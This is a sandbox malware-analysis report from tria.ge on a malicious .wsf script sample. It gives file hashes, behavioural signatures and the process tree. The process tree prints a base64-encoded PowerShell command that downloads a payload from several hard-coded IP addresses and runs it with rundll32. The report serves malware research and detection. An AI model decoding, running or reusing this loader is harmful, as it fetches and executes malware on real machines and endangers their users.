Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
27s -
max time network
30s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
11/04/2023, 16:33
Static task
static1
Behavioral task
behavioral1
Sample
dp_December.26(58288).wsf
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
dp_December.26(58288).wsf
Resource
win10v2004-20230221-en
General
-
Target
dp_December.26(58288).wsf
-
Size
186KB
-
MD5
5390aaf6fac0b4c448b30285979fe9c2
-
SHA1
05fc56ff3d86ed4944e378ac79ffadc75208a16c
-
SHA256
742fc41f10c15a25a4a4f597ad5929c8b342039b20aef6ea9e27e324932e995a
-
SHA512
475913de3df236bf04bc0037876f25d77dd0c8606337fd22119bf419b55b8c15244af35f4aab1ec70c920055d01c781d04c4ddb62e55bd243aa694a9699a394e
-
SSDEEP
3072:XSKbnv6Ypi/5IBwdlSi0xtfsq0AwZEdO8Rl+ew+H9w/+MGZSswSF:Jbv6asIBwdlSiUtfsqRdvvpw+H9w/ZGn
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1584 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1584 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1212 wrote to memory of 1584 1212 WScript.exe 28 PID 1212 wrote to memory of 1584 1212 WScript.exe 28 PID 1212 wrote to memory of 1584 1212 WScript.exe 28
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dp_December.26(58288).wsf"1⤵
- Suspicious use of WriteProcessMemory
PID:1212 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgA7ACQAUABlAGMAawBlAHIAdwBvAG8AZABHAGEAbAB1AG0AcABoAGUAZAAgAD0AIAAoACIAaAB0AHQAcAA6AC8ALwA4ADcALgAyADMANgAuADEANAA2AC4AMwA0AC8ANABCAEkAbgBOAHYAeABNAFkAcQBUAGsALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8ANQAuADQAMgAuADIAMgAxAC4AMQAyADQALwA1AGMAWgA2AGMAeQBPAFAAZwBNAC4AZABhAHQALABoAHQAdABwADoALwAvADEANAA5AC4AMQAwADIALgAyADQAMwAuADIAMAA0AC8ANQBTADQATgBCADcALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8ANAA1AC4AMQA1ADkALgAyADQAOQAuADMAMwAvAE4AQgB2AGcAbQBRAG4ANwBqAE0ALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8ANAA1AC4ANgA2AC4AMgA0ADgALgAxADgANwAvADkATgBoAEYAWQBjAHEALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8ANQAxAC4AMgAyADIALgAxADkAOQAuADIANAA0AC8AdQBuAGIANABTAEEAUABsAEMAMQAuAGQAYQB0ACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFcAaQBkAGUAcgBzAGgAaQBuAHMAQQBsAHQAbwBjAHUAbQB1AGwAdQBzACAAaQBuACAAJABQAGUAYwBrAGUAcgB3AG8AbwBkAEcAYQBsAHUAbQBwAGgAZQBkACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABXAGkAZABlAHIAcwBoAGkAbgBzAEEAbAB0AG8AYwB1AG0AdQBsAHUAcwAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwAgADEANQAgAC0ATwAgACQAZQBuAHYAOgBUAEUATQBQAFwAYQBsAGsAYQBtAGkAbgBlAFUAbgBkAHIAZQBhAGQAaQBuAGcALgBVAG4AYwBpAHQAZQBEAGkAZQBnAHUAZQBuAG8AOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAAJABlAG4AdgA6AFQARQBNAFAAXABhAGwAawBhAG0AaQBuAGUAVQBuAGQAcgBlAGEAZABpAG4AZwAuAFUAbgBjAGkAdABlAEQAaQBlAGcAdQBlAG4AbwApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABhAGwAawBhAG0AaQBuAGUAVQBuAGQAcgBlAGEAZABpAG4AZwAuAFUAbgBjAGkAdABlAEQAaQBlAGcAdQBlAG4AbwAsAE4AaQBrAG4AOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADsAfQB9AA=="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1584
-